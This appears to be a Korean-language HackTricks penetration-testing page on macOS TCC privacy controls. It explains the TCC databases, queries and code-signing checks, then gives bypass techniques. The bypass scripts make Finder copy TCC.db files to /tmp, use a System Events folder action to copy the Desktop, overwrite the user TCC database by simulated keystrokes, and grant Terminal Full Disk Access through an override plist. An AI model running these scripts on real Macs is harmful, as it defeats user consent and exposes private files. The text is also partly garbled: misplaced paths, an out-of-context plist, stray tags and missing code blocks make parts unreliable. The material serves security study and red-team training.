macOS TCC

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

기본 정보

**TCC (투명성, 동의 및 제어)**는 애플리케이션 권한을 규제하는 데 중점을 둔 보안 프로토콜입니다. 그 주요 역할은 위치 서비스, 연락처, 사진, 마이크, 카메라, 접근성 및 전체 디스크 접근과 같은 민감한 기능을 보호하는 것입니다. TCC는 이러한 요소에 대한 앱 접근을 허용하기 전에 명시적인 사용자 동의를 요구함으로써 개인 정보 보호와 사용자 데이터에 대한 제어를 강화합니다.

사용자는 애플리케이션이 보호된 기능에 대한 접근을 요청할 때 TCC를 경험합니다. 이는 사용자가 접근을 승인하거나 거부할 수 있는 프롬프트를 통해 표시됩니다. 또한, TCC는 파일을 애플리케이션으로 드래그 앤 드롭하는 것과 같은 직접적인 사용자 행동을 수용하여 특정 파일에 대한 접근을 허용하며, 애플리케이션이 명시적으로 허용된 것만 접근할 수 있도록 보장합니다.

TCC는 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd에 위치한 데몬에 의해 처리되며, /System/Library/LaunchDaemons/com.apple.tccd.system.plist에서 구성됩니다 (mach 서비스 com.apple.tccd.system 등록).

로그인한 사용자마다 실행되는 사용자 모드 tccd가 /System/Library/LaunchAgents/com.apple.tccd.plist에 정의되어 있으며, mach 서비스 com.apple.tccd와 com.apple.usernotifications.delegate.com.apple.tccd를 등록합니다.

여기에서 시스템과 사용자로서 실행 중인 tccd를 볼 수 있습니다:

ps -ef | grep tcc
0   374     1   0 Thu07PM ??         2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079     1   0  6:59PM ??         0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd

권한은 부모 애플리케이션에서 상속되며, 권한은 Bundle ID와 Developer ID를 기반으로 추적됩니다.

TCC 데이터베이스

허용/거부는 다음과 같은 TCC 데이터베이스에 저장됩니다:

• **/Library/Application Support/com.apple.TCC/TCC.db**에 있는 시스템 전체 데이터베이스.
• 이 데이터베이스는 SIP 보호되어 있어, SIP 우회만이 여기에 쓸 수 있습니다.
• 사용자 TCC 데이터베이스 **$HOME/Library/Application Support/com.apple.TCC/TCC.db**는 사용자별 설정을 위한 것입니다.
• 이 데이터베이스는 보호되어 있어, Full Disk Access와 같은 높은 TCC 권한을 가진 프로세스만 쓸 수 있습니다(하지만 SIP로 보호되지는 않습니다).

Warning

이전 데이터베이스는 읽기 접근을 위한 TCC 보호도 적용됩니다. 따라서 TCC 권한이 있는 프로세스가 아닌 이상 일반 사용자 TCC 데이터베이스를 읽을 수 없습니다.

그러나 이러한 높은 권한(예: FDA 또는 kTCCServiceEndpointSecurityClient)을 가진 프로세스는 사용자 TCC 데이터베이스에 쓸 수 있습니다.

• **/var/db/locationd/clients.plist**에 있는 세 번째 TCC 데이터베이스는 위치 서비스에 접근할 수 있는 클라이언트를 나타냅니다.
• SIP 보호 파일 /Users/carlospolop/Downloads/REG.db (TCC로 읽기 접근도 보호됨)에는 모든 유효한 TCC 데이터베이스의 위치가 포함되어 있습니다.
• SIP 보호 파일 /Users/carlospolop/Downloads/MDMOverrides.plist (TCC로 읽기 접근도 보호됨)에는 더 많은 TCC 허용 권한이 포함되어 있습니다.
• SIP 보호 파일 /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (누구나 읽을 수 있음)은 TCC 예외가 필요한 애플리케이션의 허용 목록입니다.

Tip

iOS의 TCC 데이터베이스는 **/private/var/mobile/Library/TCC/TCC.db**에 있습니다.

Tip

알림 센터 UI는 시스템 TCC 데이터베이스에 변경을 할 수 있습니다:

codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/> Support/tccd
[..]
com.apple.private.tcc.manager
com.apple.rootless.storage.TCC

그러나 사용자는 tccutil 명령줄 유틸리티로 규칙을 삭제하거나 쿼리할 수 있습니다.

데이터베이스 쿼리

sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Get all FDA
sqlite> select service, client, auth_value, auth_reason from access where service = "kTCCServiceSystemPolicyAllFiles" and auth_value=2;

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

Tip

두 데이터베이스를 확인하면 앱이 허용한 권한, 금지한 권한 또는 없는 권한(요청할 것입니다)을 확인할 수 있습니다.

• **service**는 TCC 권한의 문자열 표현입니다.
• **client**는 번들 ID 또는 권한이 있는 이진 파일의 경로입니다.
• **client_type**은 번들 식별자(0)인지 절대 경로(1)인지 나타냅니다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- Label for the job -->
<key>Label</key>
<string>com.example.yourbinary</string>

<!-- The path to the executable -->
<key>Program</key>
<string>/path/to/binary</string>

<!-- Arguments to pass to the executable (if any) -->
<key>ProgramArguments</key>
<array>
<string>arg1</string>
<string>arg2</string>
</array>

<!-- Run at load -->
<key>RunAtLoad</key>
<true/>

<!-- Keep the job alive, restart if necessary -->
<key>KeepAlive</key>
<true/>

<!-- Standard output and error paths (optional) -->
<key>StandardOutPath</key>
<string>/tmp/YourBinary.stdout</string>
<key>StandardErrorPath</key>
<string>/tmp/YourBinary.stderr</string>
</dict>
</plist>

• **auth_value**는 다음과 같은 다양한 값을 가질 수 있습니다: denied(0), unknown(1), allowed(2), 또는 limited(3).
• **auth_reason**은 다음과 같은 값을 가질 수 있습니다: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
• csreq 필드는 이진 파일을 검증하고 TCC 권한을 부여하는 방법을 나타내기 위해 존재합니다:

# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;

# To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
BLOB="FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"
echo "$BLOB" | xxd -r -p > terminal-csreq.bin
csreq -r- -t < terminal-csreq.bin

# To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
REQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F ' => ' '/designated/{print $2}')
echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin  | tr -d '\n')
echo "X'$REQ_HEX'"

• 더 많은 정보는 다른 필드에 대한 이 블로그 게시물를 확인하세요.

System Preferences --> Security & Privacy --> Privacy --> Files and Folders에서 앱에 이미 부여된 권한을 확인할 수도 있습니다.

Tip

사용자는 **tccutil**을 사용하여 규칙을 삭제하거나 쿼리할 수 있습니다.

TCC 권한 재설정

# You can reset all the permissions given to an application with
tccutil reset All app.some.id

# Reset the permissions granted to all apps
tccutil reset All

TCC 서명 검사

TCC 데이터베이스는 애플리케이션의 번들 ID를 저장하지만, 권한을 사용하려고 요청하는 앱이 올바른 것인지 확인하기 위해 서명에 대한 정보도 저장합니다.

# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
#Get csreq

# From bash
echo FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin
## Get signature checks
csreq -t -r /tmp/telegram_csreq.bin
(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = "6N38VWS5BX") and identifier "ru.keepcoder.Telegram"

Warning

따라서, 동일한 이름과 번들 ID를 사용하는 다른 애플리케이션은 다른 앱에 부여된 권한에 접근할 수 없습니다.

권한 및 TCC 권한

앱은 단순히 요청하고 접근 권한을 부여받는 것만으로는 부족하며, 관련 권한을 가져야 합니다.
예를 들어 Telegram은 카메라에 접근하기 위해 com.apple.security.device.camera 권한을 가지고 있습니다. 이 권한이 없는 앱은 카메라에 접근할 수 없으며 (사용자에게 권한을 요청하지도 않습니다).

그러나 앱이 ~/Desktop, ~/Downloads 및 ~/Documents와 같은 특정 사용자 폴더에 접근하기 위해서는 특정 권한이 필요하지 않습니다. 시스템은 접근을 투명하게 처리하고 필요에 따라 사용자에게 요청합니다.

Apple의 앱은 프롬프트를 생성하지 않습니다. 이들은 권한 목록에 사전 부여된 권한을 포함하고 있어, 결코 팝업을 생성하지 않으며, TCC 데이터베이스에 나타나지도 않습니다. 예를 들어:

codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
<key>com.apple.private.tcc.allow</key>
<array>
<string>kTCCServiceReminders</string>
<string>kTCCServiceCalendar</string>
<string>kTCCServiceAddressBook</string>
</array>

이것은 Calendar가 사용자에게 알림, 캘린더 및 주소록에 접근할 것을 요청하는 것을 피할 것입니다.

Tip

권한에 대한 공식 문서 외에도 https://newosxbook.com/ent.jl에서 비공식적인 흥미로운 정보를 찾는 것도 가능합니다.

일부 TCC 권한은: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos… 모든 권한을 정의하는 공개 목록은 없지만 이 알려진 목록을 확인할 수 있습니다.

민감한 보호되지 않은 장소

• $HOME (자체)
• $HOME/.ssh, $HOME/.aws 등
• /tmp

사용자 의도 / com.apple.macl

앞서 언급했듯이, 파일에 접근하기 위해 앱으로 드래그 앤 드롭하여 접근을 부여할 수 있습니다. 이 접근은 어떤 TCC 데이터베이스에도 명시되지 않지만 파일의 확장된 속성으로 저장됩니다. 이 속성은 허용된 앱의 UUID를 저장합니다:

xattr Desktop/private.txt
com.apple.macl

# Check extra access to the file
## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command
macl_read Desktop/private.txt
Filename,Header,App UUID
"Desktop/private.txt",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3

# Get the UUID of the app
otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3

Tip

흥미로운 점은 com.apple.macl 속성이 tccd가 아닌 Sandbox에 의해 관리된다는 것입니다.

또한, 컴퓨터에서 앱의 UUID를 허용하는 파일을 다른 컴퓨터로 이동하면, 동일한 앱이 다른 UID를 가지기 때문에 해당 앱에 대한 접근 권한이 부여되지 않는다는 점에 유의하세요.

확장 속성 com.apple.macl 는 다른 확장 속성과 달리 SIP에 의해 보호되기 때문에 지울 수 없습니다. 그러나 이 게시물에서 설명된 바와 같이, 파일을 압축하고 삭제한 후 압축 해제하면 이를 비활성화할 수 있습니다.

TCC Privesc & Bypasses

TCC에 삽입

어떤 시점에서 TCC 데이터베이스에 대한 쓰기 접근 권한을 얻으면 다음과 같은 방법을 사용하여 항목을 추가할 수 있습니다(주석을 제거하세요):

TCC 페이로드

TCC 권한이 있는 앱에 들어갈 수 있었다면, 이를 악용하기 위한 TCC 페이로드를 확인하세요:

macOS TCC Payloads

Apple Events

Apple Events에 대해 알아보세요:

macOS Apple Events

Automation (Finder) to FDA*

Automation 권한의 TCC 이름은: kTCCServiceAppleEvents
이 특정 TCC 권한은 TCC 데이터베이스 내에서 관리할 수 있는 애플리케이션을 나타냅니다 (따라서 권한이 모든 것을 관리할 수 있는 것은 아닙니다).

Finder는 항상 FDA를 가지고 있는 애플리케이션입니다 (UI에 나타나지 않더라도), 따라서 Automation 권한이 있다면, 이를 악용하여 일부 작업을 수행하게 할 수 있습니다.
이 경우 귀하의 앱은 **com.apple.Finder**에 대한 kTCCServiceAppleEvents 권한이 필요합니다.

# This AppleScript will copy the system TCC database into /tmp
osascript<<EOD
tell application "Finder"
set homeFolder to path to home folder as string
set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

osascript<<EOD
tell application "Finder"
set sourceFile to POSIX file "/Library/Application Support/com.apple.TCC/TCC.db" as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

이것을 악용하여 자신만의 사용자 TCC 데이터베이스를 작성할 수 있습니다.

Warning

이 권한을 사용하면 Finder에게 TCC 제한 폴더에 접근하도록 요청하고 파일을 받을 수 있지만, 내가 아는 한 Finder가 임의의 코드를 실행하도록 만들 수는 없습니다. 따라서 FDA 접근을 완전히 악용할 수는 없습니다.

따라서 전체 FDA 기능을 악용할 수 없습니다.

다음은 Finder에 대한 자동화 권한을 얻기 위한 TCC 프롬프트입니다:

Caution

Automator 앱이 TCC 권한 **kTCCServiceAppleEvents**를 가지고 있기 때문에, 모든 앱을 제어할 수 있습니다, 예를 들어 Finder와 같은 앱을 제어할 수 있습니다. 따라서 Automator를 제어할 수 있는 권한이 있다면 아래와 같은 코드를 사용하여 Finder도 제어할 수 있습니다:

</details>

**Script Editor 앱**에서도 동일한 일이 발생합니다. Finder를 제어할 수 있지만 AppleScript를 사용하여 스크립트를 실행하도록 강제할 수는 없습니다.

### Automation (SE) to some TCC

**System Events는 폴더 작업을 생성할 수 있으며, 폴더 작업은 일부 TCC 폴더(바탕화면, 문서 및 다운로드)에 접근할 수 있습니다.** 따라서 다음과 같은 스크립트를 사용하여 이 동작을 악용할 수 있습니다:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("cp -r $HOME/Desktop /tmp/desktop");
EOD

osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"

# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true

-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"

-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath

-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if

-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD

# File operations in the folder should trigger the Folder Action
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"

-- store the TCC.db file to copy in /tmp
osascript <<EOF
tell application "System Events"
-- Open Finder
tell application "Finder" to activate

-- Open the /tmp directory
keystroke "g" using {command down, shift down}
delay 1
keystroke "/tmp"
delay 1
keystroke return
delay 1

-- Select and copy the file
keystroke "TCC.db"
delay 1
keystroke "c" using {command down}
delay 1

-- Resolve $HOME environment variable
set homePath to system attribute "HOME"

-- Navigate to the Desktop directory under $HOME
keystroke "g" using {command down, shift down}
delay 1
keystroke homePath & "/Library/Application Support/com.apple.TCC"
delay 1
keystroke return
delay 1

-- Check if the file exists in the destination and delete if it does (need to send keystorke code: https://macbiblioblog.blogspot.com/2014/12/key-codes-for-function-and-special-keys.html)
keystroke "TCC.db"
delay 1
keystroke return
delay 1
key code 51 using {command down}
delay 1

-- Paste the file
keystroke "v" using {command down}
end tell
EOF

# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Services</key>
<dict>
<key>SystemPolicyAllFiles</key>
<array>
<dict>
<key>CodeRequirement</key>
<string>identifier &quot;com.apple.Terminal&quot; and anchor apple</string>
<key>IdentifierType</key>
<string>bundleID</string>
<key>Identifier</key>
<string>com.apple.Terminal</string>
</dict>
</array>
</dict>
</dict>
</plist>